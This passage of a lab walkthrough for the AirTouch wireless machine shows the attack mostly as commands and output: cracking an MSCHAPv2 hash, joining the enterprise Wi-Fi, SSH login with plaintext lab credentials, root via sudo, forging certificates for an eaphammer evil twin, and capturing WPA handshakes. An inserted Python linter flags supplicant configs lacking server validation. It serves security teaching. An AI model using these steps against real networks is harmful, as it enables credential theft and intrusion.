Copy hash r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d into file hash.
./hashcat/hashcat -a 0 ./hash ./rockyou.txt
r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d:laboratory
Recovered credentials:
AirTouch\r4ulcl / laboratory
Connect to AirTouch-Office (WPA-EAP)
Create wpa_eap.conf with:
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="laboratory"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Connect with wpa_supplicant:
wpa_supplicant -i wlan1 -c ./wpa_eap.conf -B
Verify connection:
iw dev wlan1 link
Connected to ac:8b:a9:f3:a1:13 (on wlan1)
SSID: AirTouch-Office
freq: 5220
RX: 55147 bytes (708 packets)
TX: 5722 bytes (171 packets)
signal: -30 dBm
rx bitrate: 6.0 MBit/s
tx bitrate: 54.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
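The supplicant block above has no ca_cert or domain_match, so a client configured this way accepts any RADIUS server certificate, which is what makes evil-twin credential capture work against most clients. As an added example (not from the writeup), this linter parses wpa_supplicant network blocks and reports those gaps; the hardened block's CA path and server name are assumptions, and the password is a placeholder.

```python
import os
import re

# The network block from the writeup, password replaced by a placeholder.
# Raw string: the identity contains a literal backslash.
WRITEUP_CONF = r"""
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="<password>"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
"""

# Same network with server validation pinned. The CA file path and the RADIUS
# server name are assumptions for illustration, not values from the box.
HARDENED_CONF = r"""
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="<password>"
ca_cert="/etc/wpa_supplicant/airtouch-ca.pem"
domain_match="radius.AirTouch.htb"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
"""

# System bundles that would let any public CA issue an acceptable server cert.
PUBLIC_BUNDLES = {"ca-certificates.crt", "ca-bundle.crt", "cert.pem"}


def parse_networks(conf_text):
    """Return one dict per network={...} block; values are unquoted strings."""
    networks = []
    for body in re.findall(r"network=\{(.*?)\}", conf_text, re.S):
        net = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            net[key.strip()] = value.strip().strip('"')
        networks.append(net)
    return networks


def lint_eap_network(net):
    """Finding codes (my own) for a WPA-EAP block; empty means validation is pinned."""
    findings = []
    if "WPA-EAP" not in net.get("key_mgmt", "").split():
        return findings                          # PSK/open blocks are out of scope
    ca = net.get("ca_cert", "")
    if not ca:
        findings.append("NO_CA_CERT")            # any server certificate is accepted
    elif os.path.basename(ca) in PUBLIC_BUNDLES:
        findings.append("PUBLIC_CA_BUNDLE")      # any public CA can vouch for the server
    if not any(k in net for k in ("domain_match", "domain_suffix_match", "subject_match")):
        findings.append("NO_SERVER_NAME_CHECK")  # any cert from that CA passes
    return findings


def lint_config(conf_text):
    """SSID -> findings for every network block in a wpa_supplicant config."""
    return {n.get("ssid", "?"): lint_eap_network(n) for n in parse_networks(conf_text)}
```

On this box the attacker held the genuine server.key from certs-backup, so even a pinned client would have accepted the evil twin; the lint catches the far more common case of clients that skip validation, while the box's own lesson is that server keys must not travel in backups driven by hard-coded passwords.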
Get IP:
dhclient -v wlan1
bound to 10.10.10.98 -- renewal in 343360 seconds.
Now scan network:
./nmap -e wlan1 10.10.10.0/24 -p- -v
Nmap scan report for 10.10.10.1
Host is up (0.000021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
MAC Address: AC:8B:A9:AA:3F:D2 (Unknown)
This is the AP.
Recall we found credentials for this host (10.10.10.1):
remote / xGgWEwqUpfoOVsLeROeG
Connect with SSH:
ssh remote@10.10.10.1
Enter password xGgWEwqUpfoOVsLeROeG.
We get a shell.
find / -name "hostapd_wpe.*" 2>/dev/null
/etc/hostapd/hostapd_wpe.conf.tmp
/etc/hostapd/hostapd_wpe.eap_user
/var/log/hostapd_wpe.log
cat /etc/hostapd/hostapd_wpe.eap_user
We notice:
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
su admin
Enter password xMJpzXt4D9ouMuL3JJsMriF7KZozm7.
sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on AirTouch-AP-MGT:
(ALL) ALL
(ALL) NOPASSWD: ALL
Get root shell:
sudo -i
We get a shell as root.
Useful Notes
Note 1 - Extract certificate of an enterprise Wi-Fi network
We can extract the certificate with Wireshark. We need to sniff traffic.
First, run airodump-ng on wlan1:
airodump-ng -c 44 --band abg wlan1
On the victim machine there is no tcpdump.
Download statically compiled tcpdump from:
https://github.com/yunchih/static-binaries/raw/refs/heads/master/tcpdump
and upload it to victim.
Sniff traffic and save to .pcap file:
./tcpdump -i wlan1 -w stuff.pcap
Copy stuff.pcap to attacker machine.
Open Wireshark:
wireshark
Click open and load stuff.pcap.
We can see packets like Server Hello, Certificate, etc.
Useful site: https://unix.stackexchange.com/questions/499528/extracting-a-ca-certificate-from-an-enterprise-wifi-eap-network
Click one of those packets.
Expand Extensible Authentication Protocol.
Expand Transport Layer Security.
TLSv1.2 Record Layer: Handshake Protocol: Certificate
Expand Handshake Protocol: Certificate.
Expand Certificates.
Right click Certificate.
Export packet bytes.
Save as cert.der.
openssl x509 -inform DER -in cert.der -text -noout
For example we see certificate info:
Issuer: C = ES, ST = Madrid, L = Madrid, O = AirTouch, OU = Certificate Authority, CN = AirTouch CA, emailAddress = ca@AirTouch.htb
Validity
Not Before: Feb 27 17:07:54 2024 GMT
Not After : Feb 24 17:07:54 2034 GMT
Subject: C = ES, L = Madrid, O = AirTouch, OU = Server, CN = AirTouch CA, emailAddress = server@AirTouch.htb
Now, for example, we could generate a certificate with the same information:
openssl x509 -in cert.der -noout -subject -issuer
subject=C = ES, L = Madrid, O = AirTouch, OU = Server, CN = AirTouch CA, emailAddress=server@AirTouch.htb
issuer=C = ES, ST = Madrid, L = Madrid, O = AirTouch, OU = Certificate Authority, CN = AirTouch CA, emailAddress=ca@AirTouch.htb
openssl req -x509 -newkey rsa:2048 -sha256 -nodes -keyout myca.key -out ca.crt -days 365 -subj "/C=ES/ST=Madrid/L=Madrid/O=AirTouch/OU=Certificate Authority/CN=AirTouch CA/emailAddress=ca@AirTouch.htb"
openssl req -x509 -newkey rsa:2048 -sha256 -nodes -CA ca.crt -CAkey myca.key -keyout myserver.key -out myserver.crt -days 365 -subj "/C=ES/L=Madrid/O=AirTouch/OU=Server/CN=AirTouch CA/emailAddress=server@AirTouch.htb"
./eaphammer --cert-wizard import --ca-cert ca.crt --private-key myserver.key --server-cert myserver.crt
Of course this will not be identical to the original, because we do not have the original private key. On this machine, our fake certificate does not work.
Note 2 - Capture WPA-PSK handshake with eaphammer
./eaphammer -i wlan0 --channel 6 --auth wpa-psk --essid AirTouch-Internet --bssid F0:9F:C2:A3:F1:A7 --creds
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx
We get:
[EAPHAMMER] Captured a WPA/2 handshake from: 28:6c:07:fe:a3:22
[EAPHAMMER] Captured a WPA/2 handshake from: 28:6c:07:fe:a3:22
Download file loot/wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx, for example with scp.
hcxhashtool --hccapx-in wpa_handshake_capture-2026-02-05-16-34-09-1Bo6xAKYGJVYGJdhuxgH4xAXHv48JWdg.hccapx -o hashes.txt
In this case all hashes in hashes.txt are identical, so take one and put it in file hash.
./hashcat/hashcat -a 0 -m 22000 ./hash ./rockyou.txt
Interestingly, this does not crack. Cracking the handshake captured with airodump-ng using aircrack-ng, however, does recover the password.